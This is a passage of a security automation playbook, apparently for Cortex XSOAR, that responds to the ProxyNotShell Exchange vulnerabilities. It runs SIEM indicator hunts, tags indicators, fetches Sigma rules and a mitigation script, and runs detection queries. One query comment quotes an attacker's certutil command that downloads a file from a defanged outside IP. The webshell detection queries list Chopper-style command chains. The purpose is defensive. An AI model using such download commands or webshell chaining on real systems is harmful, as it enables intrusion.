      iscommand: false
      brand: ""
    nexttasks:
      '#none#':
      - "55"
    scriptarguments:
      IPAddress:
        complex:
          root: ExtractedIndicators
          accessor: IP
          transformers:
          - operator: uniq
      IndexName:
        complex:
          root: inputs.SplunkIndex
      MD5:
        complex:
          root: ExtractedIndicators.File
          filters:
          - - operator: hasLength
              left:
                value:
                  simple: ExtractedIndicators.File
                iscontext: true
              right:
                value:
                  simple: "32"
          transformers:
          - operator: uniq
      SHA256:
        complex:
          root: ExtractedIndicators.File
          filters:
          - - operator: hasLength
              left:
                value:
                  simple: ExtractedIndicators.File
                iscontext: true
              right:
                value:
                  simple: "64"
          transformers:
          - operator: uniq
      SelectFields:
        simple: source,timestamp
      URLDomain:
        complex:
          root: ExtractedIndicators
          accessor: Domain
          transformers:
          - operator: append
            args:
              item:
                value:
                  simple: ExtractedIndicators.URL
                iscontext: true
          - operator: uniq
      earliest_time:
        complex:
          root: inputs.SplunkEarliestTime
      event_limit:
        simple: "100"
      latest_time:
        complex:
          root: inputs.SplunkLatestTime
    separatecontext: true
    continueonerrortype: ""
    loop:
      iscommand: false
      scriptArguments:
        IPAddress:
          complex:
            root: ExtractedIndicators
            accessor: IP
            transformers:
            - operator: uniq
        IndexName:
          simple: index=*
        MD5:
          complex:
            root: ExtractedIndicators
            filters:
            - - operator: stringHasLength
                left:
                  value:
                    simple: ExtractedIndicators
                  iscontext: true
                right:
                  value:
                    simple: "32"
            accessor: File
            transformers:
            - operator: uniq
        SHA1:
          complex:
            root: ExtractedIndicators
            filters:
            - - operator: stringHasLength
                left:
                  value:
                    simple: ExtractedIndicators
                  iscontext: true
                right:
                  value:
                    simple: "40"
            accessor: File
            transformers:
            - operator: uniq
        SHA256:
          complex:
            root: ExtractedIndicators
            filters:
            - - operator: stringHasLength
                left:
                  value:
                    simple: ExtractedIndicators
                  iscontext: true
                right:
                  value:
                    simple: "64"
            accessor: File
            transformers:
            - operator: uniq
        SelectFields:
          simple: source,timestamp
        URLDomain:
          complex:
            root: ExtractedIndicators
            accessor: Domain
            transformers:
            - operator: uniq
        earliest_time:
          complex:
            root: inputs.SplunkEarliestTime
        event_limit:
          simple: "100"
        latest_time:
          complex:
            root: inputs.SplunkLatestTime
      exitCondition: ""
      wait: 1
      max: 100
    view: |-
      {
        "position": {
          "x": -530,
          "y": 1570
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "18":
    id: "18"
    taskid: a1ad4a52-a3dd-4514-8b8f-e11fd8695b02
    type: playbook
    task:
      id: a1ad4a52-a3dd-4514-8b8f-e11fd8695b02
      version: -1
      name: QRadar Indicator Hunting V2
      description: 'The Playbook queries QRadar SIEM for indicators such as file hashes, IP addresses, domains, or urls. '
      playbookName: QRadar Indicator Hunting V2
      type: playbook
      iscommand: false
      brand: ""
    nexttasks:
      '#none#':
      - "55"
    scriptarguments:
      IPAddress:
        complex:
          root: ExtractedIndicators
          accessor: IP
          transformers:
          - operator: uniq
      InvestigationIPFields:
        simple: sourceip,destinationip
      InvestigationUserFields:
        simple: username
      MD5:
        complex:
          root: ExtractedIndicators.File
          filters:
          - - operator: hasLength
              left:
                value:
                  simple: ExtractedIndicators.File
                iscontext: true
              right:
                value:
                  simple: "32"
          transformers:
          - operator: uniq
      QradarIPfield:
        simple: sourceip,destinationip
      SHA256:
        complex:
          root: ExtractedIndicators.File
          filters:
          - - operator: hasLength
              left:
                value:
                  simple: ExtractedIndicators.File
                iscontext: true
              right:
                value:
                  simple: "64"
          transformers:
          - operator: uniq
      TimeFrame:
        complex:
          root: inputs.QRadarTimeRange
      URLDomain:
        complex:
          root: ExtractedIndicators
          accessor: Domain
          transformers:
          - operator: uniq
    separatecontext: true
    continueonerrortype: ""
    loop:
      iscommand: false
      scriptArguments:
        IPAddress:
          complex:
            root: ExtractedIndicators
            accessor: IP
            transformers:
            - operator: uniq
        InvestigationIPFields:
          simple: sourceip,destinationip
        InvestigationUserFields:
          simple: username
        MD5:
          complex:
            root: ExtractedIndicators.File
            filters:
            - - operator: stringHasLength
                left:
                  value:
                    simple: ExtractedIndicators.File
                  iscontext: true
                right:
                  value:
                    simple: "32"
            transformers:
            - operator: uniq
        QradarIPfield:
          simple: sourceip,destinationip
        SHA1:
          complex:
            root: ExtractedIndicators.File
            filters:
            - - operator: stringHasLength
                left:
                  value:
                    simple: ExtractedIndicators.File
                  iscontext: true
                right:
                  value:
                    simple: "40"
            transformers:
            - operator: uniq
        SHA256:
          complex:
            root: ExtractedIndicators.File
            filters:
            - - operator: stringHasLength
                left:
                  value:
                    simple: ExtractedIndicators.File
                  iscontext: true
                right:
                  value:
                    simple: "64"
            transformers:
            - operator: uniq
        TimeFrame:
          complex:
            root: inputs.QRadarTimeRange
        URLDomain:
          complex:
            root: ExtractedIndicators
            accessor: Domain
            transformers:
            - operator: uniq
      exitCondition: ""
      wait: 1
      max: 100
    view: |-
      {
        "position": {
          "x": -2660,
          "y": 1570
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "19":
    id: "19"
    taskid: fbc1055e-ef71-4fe5-8648-0d5d91e6869c
    type: title
    task:
      id: fbc1055e-ef71-4fe5-8648-0d5d91e6869c
      version: -1
      name: Remediation
      type: title
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "78"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 3810
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "20":
    id: "20"
    taskid: ef3ac3c0-0c5c-4587-81f3-0c9912c70295
    type: title
    task:
      id: ef3ac3c0-0c5c-4587-81f3-0c9912c70295
      version: -1
      name: Recommended Workarounds
      type: title
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "59"
      - "77"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -80,
          "y": 4110
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "21":
    id: "21"
    taskid: cef8d029-697f-4543-87f1-653f786b51ce
    type: title
    task:
      id: cef8d029-697f-4543-87f1-653f786b51ce
      version: -1
      name: Deploy Detection Rules
      type: title
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "25"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -540,
          "y": 4110
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "22":
    id: "22"
    taskid: e306360f-5313-4777-8af3-ce304d3e57bb
    type: regular
    task:
      id: e306360f-5313-4777-8af3-ce304d3e57bb
      version: -1
      name: Detect certutil netcons to public IP addresses
      description: |-
        Execute an XQL query and retrieve results of an executed XQL query API. The command will be executed every 10 seconds until results are retrieved or until a timeout error is raised.
        When more than 1000 results are retrieved, the command will return a compressed gzipped JSON format file,
        unless the argument 'parse_result_file_to_context' is set to true and then the results will be extracted to the context.
      script: '|||xdr-xql-generic-query'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "19"
    scriptarguments:
      query:
        simple: "// Description: Detect certutil netcons to public IP addresses. May be used in latest Exchange 0day for connection checks\n// REF: https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html\n// Notes: Filters included at bottom. Most likely is something like the following: certutil.exe -urlcache -split -f hxxp[:]//206[.]188.196.77:8080/themes.aspx\n\nconfig case_sensitive = false\n| dataset = xdr_data\n| filter event_type = STORY and actor_process_image_name = \"certutil.exe\"\n| comp count() by agent_hostname, actor_process_image_name, action_external_hostname, action_remote_ip, action_remote_port, actor_process_command_line\n\n// #### Start: Internal/External IP component #########################################################\n// INSTRUCTIONS: Modify input and output fields as necessary\n\n// ###### Modify Input Fields\n// Change \"action_remote_ip\" to the desired IP address field you wish to enrich/filter on\n| alter cmpnt_input_ip_addr = action_remote_ip\n\n// Component logic \n| alter cmpnt_output_dest_is_internal = if(cmpnt_input_ip_addr ~= \"^10[.].*\" or cmpnt_input_ip_addr ~= \"^192[.]168[.].*\", \"true\", \"false\")\n| alter rfc1918_172 = incidr(cmpnt_input_ip_addr, \"172.16.0.0/12\")\n| alter cmpnt_output_dest_is_internal = if(cmpnt_output_dest_is_internal = \"false\" and rfc1918_172 = false, \"false\", \"true\")\n\n// Optional: Remove other reserved/private network addresses\n| alter carrier_nat = incidr(cmpnt_input_ip_addr, \"100.64.0.0/10\")\n| alter loopback = incidr(cmpnt_input_ip_addr, \"127.0.0.0/8\")\n| alter link_local = incidr(cmpnt_input_ip_addr, \"169.254.0.0/16\")\n| alter multicast = incidr(cmpnt_input_ip_addr, \"224.0.0.0/4\")\n| alter broadcast = incidr(cmpnt_input_ip_addr, \"255.255.255.255/32\")\n| alter rfc5735 = incidr(cmpnt_input_ip_addr, \"0.0.0.0/8\")\n| alter cmpnt_output_dest_is_internal = if(cmpnt_output_dest_is_internal = \"false\" and carrier_nat = false and loopback = false and link_local = false and multicast = false and broadcast = false and rfc5735 = false, \"false\", \"true\")\n\n// Optional Filter to remove results with internal (private) ip addresses\n| filter cmpnt_output_dest_is_internal = \"false\"\n\n// ###### Modify Output Fields\n| alter ip_is_internal = cmpnt_output_dest_is_internal\n// | fields - cmpnt_input_ip_addr, cmpnt_output_dest_is_internal, rfc1918_172\n| fields - cmpnt_input_ip_addr, cmpnt_output_dest_is_internal, rfc1918_172, carrier_nat, loopback, link_local, multicast, broadcast, rfc5735 // If optional reserved/private network enrichment is present\n\n\n\n// #### End: Internal/External IP component #########################################################\n\n// Optional filters\n| filter ip_is_internal = \"false\"\n| alter suspicious_port_in_command_line = if(actor_process_command_line contains \":8080\", \"true\", \"false\")"
      query_name:
        simple: Detect certutil netcons to public IP addresses. May be used in the latest Exchange 0day for connection checks
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -1810,
          "y": 3630
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 2
    isoversize: false
    isautoswitchedtoquietmode: false
  "23":
    id: "23"
    taskid: 119e20a6-ae52-4ef6-87b5-d397e9133662
    type: regular
    task:
      id: 119e20a6-ae52-4ef6-87b5-d397e9133662
      version: -1
      name: Exchange On-premises Mitigation Tool v2
      description: Sends a HTTP request with advanced capabilities
      scriptName: HttpV2
      type: regular
      iscommand: false
      brand: ""
    nexttasks:
      '#none#':
      - "35"
    scriptarguments:
      filename:
        simple: EOMTv2.ps1
      method:
        simple: GET
      url:
        simple: https://github.com/microsoft/CSS-Exchange/releases/latest/download/EOMTv2.ps1
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": -390
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "25":
    id: "25"
    taskid: 277c8f96-f627-4881-86d9-cb2f95b6c9a8
    type: regular
    task:
      id: 277c8f96-f627-4881-86d9-cb2f95b6c9a8
      version: -1
      name: Sigma Rules
      description: Sigma rules files have been downloaded and are available for download directly from XSOAR.
      type: regular
      iscommand: false
      brand: ""
    nexttasks:
      '#none#':
      - "30"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -540,
          "y": 4260
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "26":
    id: "26"
    taskid: 99a869f1-f141-42ec-8d4d-54441f94c6bb
    type: condition
    task:
      id: 99a869f1-f141-42ec-8d4d-54441f94c6bb
      version: -1
      name: Analysis resolution - Should continue with the investigation?
      description: Check with the analyst whether to continue with the investigation.
      type: condition
      iscommand: false
      brand: ""
    nexttasks:
      "No":
      - "29"
      "Yes":
      - "28"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 4560
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    message:
      to:
      subject:
      body:
        simple: Do you need to continue with the investigation?
      methods: []
      format: ""
      bcc:
      cc:
      timings:
        retriescount: 2
        retriesinterval: 360
        completeafterreplies: 1
        completeafterv2: false
        completeaftersla: false
      replyOptions:
      - "Yes"
      - "No"
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "27":
    id: "27"
    taskid: acc3b073-00a3-4982-8582-6edadb76dfbb
    type: title
    task:
      id: acc3b073-00a3-4982-8582-6edadb76dfbb
      version: -1
      name: Done
      type: title
      iscommand: false
      brand: ""
      description: ''
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 4930
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "28":
    id: "28"
    taskid: f895e0a9-5953-4776-8809-a132678459c1
    type: regular
    task:
      id: f895e0a9-5953-4776-8809-a132678459c1
      version: -1
      name: Investigate Further
      description: Manual step for further incident investigation. CISA released an open-source detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability. For more information , [CISA GitHub](https://github.com/cisagov/log4j-scanner/tree/master/log4-scanner)
      type: regular
      iscommand: false
      brand: ""
    nexttasks:
      '#none#':
      - "27"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -760,
          "y": 4760
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "29":
    id: "29"
    taskid: 94b83a87-72fb-4272-8d3f-f73ea68ca998
    type: regular
    task:
      id: 94b83a87-72fb-4272-8d3f-f73ea68ca998
      version: -1
      name: Close Investigation
      description: Close the current incident
      script: Builtin|||closeInvestigation
      type: regular
      iscommand: true
      brand: Builtin
    nexttasks:
      '#none#':
      - "27"
    scriptarguments:
      closeReason:
        simple: No further actions are required.
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 4760
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "30":
    id: "30"
    taskid: 52cf703d-bcd9-435d-8027-365c6af2379c
    type: title
    task:
      id: 52cf703d-bcd9-435d-8027-365c6af2379c
      version: -1
      name: Resolution
      type: title
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "26"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 4430
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "31":
    id: "31"
    taskid: 00fa0ebc-c8e0-454b-85e6-78679813eb75
    type: regular
    task:
      id: 00fa0ebc-c8e0-454b-85e6-78679813eb75
      version: -1
      name: Detect Chopper Webshell process pattern
      description: |-
        Detects patterns in process executions caused by China Chopper-like tiny (ASPX) webshells.

        **Author:** Florian Roth (rule), MSTI (query)

        **Status:** experimental

        **References:**
            - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/
      tags:
      - SIEMResults
      script: '|||splunk-search'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "17"
    scriptarguments:
      earliest_time:
        complex:
          root: inputs.SplunkEarliestTime
      latest_time:
        complex:
          root: inputs.SplunkLatestTime
      query:
        simple: source="WinEventLog:*" AND ((Image="*\\w3wp.exe" OR ParentImage="*\\w3wp.exe") AND (CommandLine="*&ipconfig&echo*" OR CommandLine="*&quser&echo*" OR CommandLine="*&whoami&echo*" OR CommandLine="*&c:&echo*" OR CommandLine="*&cd&echo*" OR CommandLine="*&dir&echo*" OR CommandLine="*&echo [E]*" OR CommandLine="*&echo [S]*"))
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -530,
          "y": 1400
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "32":
    id: "32"
    taskid: f5cfc3d9-1f7c-4d27-8ab6-a945bfa16cdb
    type: regular
    task:
      id: f5cfc3d9-1f7c-4d27-8ab6-a945bfa16cdb
      version: -1
      name: Detect DLL and EXE writes to Public folder on Exchange/IIS hosts
      description: |-
        Execute an XQL query and retrieve results of an executed XQL query API. The command will be executed every 10 seconds until results are retrieved or until a timeout error is raised.
        When more than 1000 results are retrieved, the command will return a compressed gzipped JSON format file,
        unless the argument 'parse_result_file_to_context' is set to true and then the results will be extracted to the context.
      script: '|||xdr-xql-generic-query'
      type: regular
      iscommand: true
      brand: ""
    nexttasks:
      '#none#':
      - "19"
    scriptarguments:
      query:
        simple: "// Detect DLL and EXE writes to Public folder (C:\\Users\\Public\\) on Exchange/IIS hosts. Used as part of latest Exchange 0-day exploit\n// REF: https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html\n\nconfig case_sensitive = false\n| dataset = xdr_data\n| filter event_type = FILE and \n        (event_sub_type = ENUM.FILE_WRITE or event_sub_type = ENUM.FILE_CREATE_NEW) and \n        action_file_extension in (\"exe\", \"dll\") and\n        action_file_path contains \"C:\\Users\\Public\"\n\n| fields event_type, event_sub_type, agent_hostname, actor_effective_username, action_file_path, action_file_extension, actor_process_image_name, causality_actor_process_image_name\n\n\n// #### Start: IIS/Exchange Server Identification Component #############################################\n// ## Modify Input Field (Enrich or filter based off this field):\n| alter iis_id_cmpnt_input_hostname = agent_hostname\n\n// ## Modify Component behavior: \"right\" for filter, \"left\" for enrichment\n| join conflict_strategy = right type=inner \n    (\n        dataset = xdr_data\n        | filter (event_type = PROCESS and actor_process_image_name = \"w3wp.exe\")\n        // w3wp process executes on IIS servers\n        | comp count(event_timestamp) as w3wp_event_count by actor_process_image_name, agent_hostname\n        | alter hostname_is_iis_or_exchange_server = \"true\"\n// ## Modify Output Fields and Field Names (if set to Enrich)\n        | fields agent_hostname, hostname_is_iis_or_exchange_server as is_iis_or_exchange_server\n    ) as iis_list iis_list.agent_hostname = iis_id_cmpnt_input_hostname\n\n// #### End: IIS/Exchange Server Identification Component ###############################################"
      query_name:
        simple: msdt.exe execution with a suspicious argument
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -1390,
          "y": 3630
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "33":
    id: "33"
    taskid: 96822dbf-f19d-4f99-8dd2-f3911f0e5aae
    type: title
    task:
      id: 96822dbf-f19d-4f99-8dd2-f3911f0e5aae
      version: -1
      name: Collect Indicators
      type: title
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "79"
      - "80"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": 130,
          "y": -530
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "35":
    id: "35"
    taskid: 41cf7702-120f-4d38-80a6-434d179b5055
    type: title
    task:
      id: 41cf7702-120f-4d38-80a6-434d179b5055
      version: -1
      name: Extract Indicators
      type: title
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "36"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": -210
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "36":
    id: "36"
    taskid: b684298e-349d-41cb-844d-a2bd71e166cd
    type: regular
    task:
      id: b684298e-349d-41cb-844d-a2bd71e166cd
      version: -1
      name: Extract Indicators From Data Collected
      description: commands.local.cmd.extract.indicators
      script: Builtin|||extractIndicators
      type: regular
      iscommand: true
      brand: Builtin
    nexttasks:
      '#none#':
      - "37"
    scriptarguments:
      text:
        complex:
          root: http.parsedBlog
          accessor: indicators
    reputationcalc: 2
    separatecontext: false
    continueonerror: true
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": -80
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "37":
    id: "37"
    taskid: 86b6c167-4342-44a8-8bd1-0045451d3199
    type: title
    task:
      id: 86b6c167-4342-44a8-8bd1-0045451d3199
      version: -1
      name: Tag and Link Indicators
      type: title
      iscommand: false
      brand: ""
      description: ''
    nexttasks:
      '#none#':
      - "39"
      - "40"
      - "41"
      - "45"
      - "44"
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 80
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "38":
    id: "38"
    taskid: 322a9857-091e-4bff-8ae9-989728454d37
    type: regular
    task:
      id: 322a9857-091e-4bff-8ae9-989728454d37
      version: -1
      name: Link Indicators To Incident
      description: commands.local.cmd.associate.indicators
      script: Builtin|||associateIndicatorsToIncident
      type: regular
      iscommand: true
      brand: Builtin
    nexttasks:
      '#none#':
      - "63"
    scriptarguments:
      incidentId:
        complex:
          root: incident
          accessor: id
      indicatorsValues:
        complex:
          root: ExtractedIndicators.IP
          filters:
          - - operator: isNotEmpty
              left:
                value:
                  simple: ExtractedIndicators.IP
                iscontext: true
          transformers:
          - operator: append
            args:
              item:
                value:
                  simple: ExtractedIndicators.Domain
                iscontext: true
          - operator: append
            args:
              item:
                value:
                  simple: ExtractedIndicators.URL
                iscontext: true
          - operator: append
            args:
              item:
                value:
                  simple: ExtractedIndicators.CVE
                iscontext: true
          - operator: append
            args:
              item:
                value:
                  simple: ExtractedIndicators.File
                iscontext: true
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 410
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "39":
    id: "39"
    taskid: a45a9609-35f3-40a2-8dff-d29d01dc5e13
    type: regular
    task:
      id: a45a9609-35f3-40a2-8dff-d29d01dc5e13
      version: -1
      name: Tag File indicators
      description: commands.local.cmd.new.indicator
      script: Builtin|||createNewIndicator
      type: regular
      iscommand: true
      brand: Builtin
    nexttasks:
      '#none#':
      - "38"
    scriptarguments:
      retry-count:
        simple: "3"
      retry-interval:
        simple: "2"
      tags:
        simple: CVE-2022-41040, CVE-2022-41082, MSDT, ProxyNotShell
      type:
        simple: File
      value:
        complex:
          root: ExtractedIndicators.File
          filters:
          - - operator: isNotEmpty
              left:
                value:
                  simple: ExtractedIndicators.File
                iscontext: true
          transformers:
          - operator: uniq
    separatecontext: false
    continueonerror: true
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -310,
          "y": 240
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "40":
    id: "40"
    taskid: 1ae97c6f-26c4-44fd-8efe-99150bbcaa98
    type: regular
    task:
      id: 1ae97c6f-26c4-44fd-8efe-99150bbcaa98
      version: -1
      name: Tag CVE indicators
      description: commands.local.cmd.new.indicator
      script: Builtin|||createNewIndicator
      type: regular
      iscommand: true
      brand: Builtin
    nexttasks:
      '#none#':
      - "38"
    scriptarguments:
      retry-count:
        simple: "3"
      retry-interval:
        simple: "2"
      tags:
        simple: MSDT, ProxyNotShell
      type:
        simple: CVE
      value:
        complex:
          root: ExtractedIndicators.CVE
          filters:
          - - operator: isNotEmpty
              left:
                value:
                  simple: ExtractedIndicators.CVE
                iscontext: true
          transformers:
          - operator: uniq
          - operator: SetIfEmpty
            args:
              applyIfEmpty: {}
              defaultValue:
                value:
                  simple: inputs.CVEs
                iscontext: true
          - operator: split
            args:
              delimiter:
                value:
                  simple: ','
    separatecontext: false
    continueonerror: true
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": 130,
          "y": 240
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "41":
    id: "41"
    taskid: 70235a03-c37e-4849-8a8b-94ea940576d3
    type: regular
    task:
      id: 70235a03-c37e-4849-8a8b-94ea940576d3
      version: -1
      name: Tag Domain indicators
      description: commands.local.cmd.new.indicator
      script: Builtin|||createNewIndicator
      type: regular
      iscommand: true
      brand: Builtin
    nexttasks:
      '#none#':
      - "38"
    scriptarguments:
      retry-count:
        simple: "3"
      retry-interval:
        simple: "2"
      tags:
        simple: CVE-2022-41040, CVE-2022-41082, MSDT, ProxyNotShell
      type:
        simple: Domain
      value:
        complex:
          root: ExtractedIndicators.Domain
          filters:
          - - operator: isNotEmpty
              left:
                value:
                  simple: ExtractedIndicators.Domain
                iscontext: true
          transformers:
          - operator: uniq
    separatecontext: false
    continueonerror: true
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -750,
          "y": 240
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "42":
    id: "42"
    taskid: 75c22f3f-5338-44e9-828a-eae51957e1c2
    type: playbook
    task:
      id: 75c22f3f-5338-44e9-828a-eae51957e1c2
      version: -1
      name: Detect Chopper Webshell process pattern
      description: This playbook runs a QRadar query and return its results to the context.
      playbookName: QRadarFullSearch
      type: playbook
      iscommand: false
      brand: ""
    nexttasks:
      '#none#':
      - "18"
    scriptarguments:
      interval:
        simple: "1"
      query_expression:
        simple: SELECT UTF8(payload) from events where LOGSOURCETYPENAME(devicetype)='Microsoft Windows Security Event Log' and ("Image" ilike '%\w3wp.exe' or "ParentImage" ilike '%\w3wp.exe') and ("Process CommandLine" ilike '%&ipconfig&echo%' or "Process CommandLine" ilike '%&quser&echo%' or "Process CommandLine" ilike '%&whoami&echo%' or "Process CommandLine" ilike '%&c:&echo%' or "Process CommandLine" ilike '%&cd&echo%' or "Process CommandLine" ilike '%&dir&echo%' or "Process CommandLine" ilike '%&echo [E]%' or "Process CommandLine" ilike '%&echo [S]%')
      timeout:
        simple: "600"
    separatecontext: true
    continueonerrortype: ""
    loop:
      iscommand: false
      exitCondition: ""
      wait: 1
      max: 0
    view: |-
      {
        "position": {
          "x": -2660,
          "y": 1400
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "43":
    id: "43"
    taskid: c97b9058-c215-4bb0-81c9-6eebeac05810
    type: regular
    task:
      id: c97b9058-c215-4bb0-81c9-6eebeac05810
      version: -1
      name: Webshell dropped by exchange detection
      description: Download Sigma Rules
      scriptName: http
      type: regular
      iscommand: false
      brand: ""
    nexttasks:
      '#none#':
      - "35"
    scriptarguments:
      filename:
        simple: file_event_win_exchange_webshell_drop.yml
      method:
        simple: GET
      saveAsFile:
        simple: "yes"
      url:
        simple: https://raw.githubusercontent.com/SigmaHQ/sigma/master/rules/windows/file_event/file_event_win_exchange_webshell_drop.yml
    separatecontext: false
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -1170,
          "y": -390
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: true
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "44":
    id: "44"
    taskid: 473bb43b-1501-45ef-81b4-d90b30d886c8
    type: regular
    task:
      id: 473bb43b-1501-45ef-81b4-d90b30d886c8
      version: -1
      name: Tag IP indicators
      description: commands.local.cmd.new.indicator
      script: Builtin|||createNewIndicator
      type: regular
      iscommand: true
      brand: Builtin
    nexttasks:
      '#none#':
      - "38"
    scriptarguments:
      retry-count:
        simple: "3"
      retry-interval:
        simple: "2"
      tags:
        simple: CVE-2022-41040, CVE-2022-41082, MSDT, ProxyNotShell
      type:
        simple: IP
      value:
        complex:
          root: ExtractedIndicators.IP
          filters:
          - - operator: isNotEmpty
              left:
                value:
                  simple: ExtractedIndicators.IP
                iscontext: true
          transformers:
          - operator: uniq
    separatecontext: false
    continueonerror: true
    continueonerrortype: ""
    view: |-
      {
        "position": {
          "x": -1170,
          "y": 240
        }
      }
    note: false
    timertriggers: []
    ignoreworker: false
    skipunavailable: false
    quietmode: 0
    isoversize: false
    isautoswitchedtoquietmode: false
  "45":
    id: "45"
    taskid: bd6740d4-1e7b-44b6-85da-9e78e482eb39
    type: regular
    task:
      id: bd6740d4-1e7b-44b6-85da-9e78e482eb39
      version: -1
      name: Tag URL indicators
      description: commands.local.cmd.new.indicator
      script: Builtin|||createNewIndicator
      type: regular
      iscommand: true
      brand: Builtin
    nexttasks:
      '#none#':
      - "38"
    scriptarguments:
      retry-count:
        simple: "3"
      retry-interval:
        simple: "2"
      tags:
        simple: CVE-2022-41040, CVE-2022-41082, MSDT, ProxyNotShell
      type:
        simple: URL
      value:
        complex:
          root: ExtractedIndicators.URL
          filters:
          - - operator: isNotEmpty
              left:
                value:
                  simple: ExtractedIndicators.URL
                iscontext: true
          transformers:
          - operator: uniq
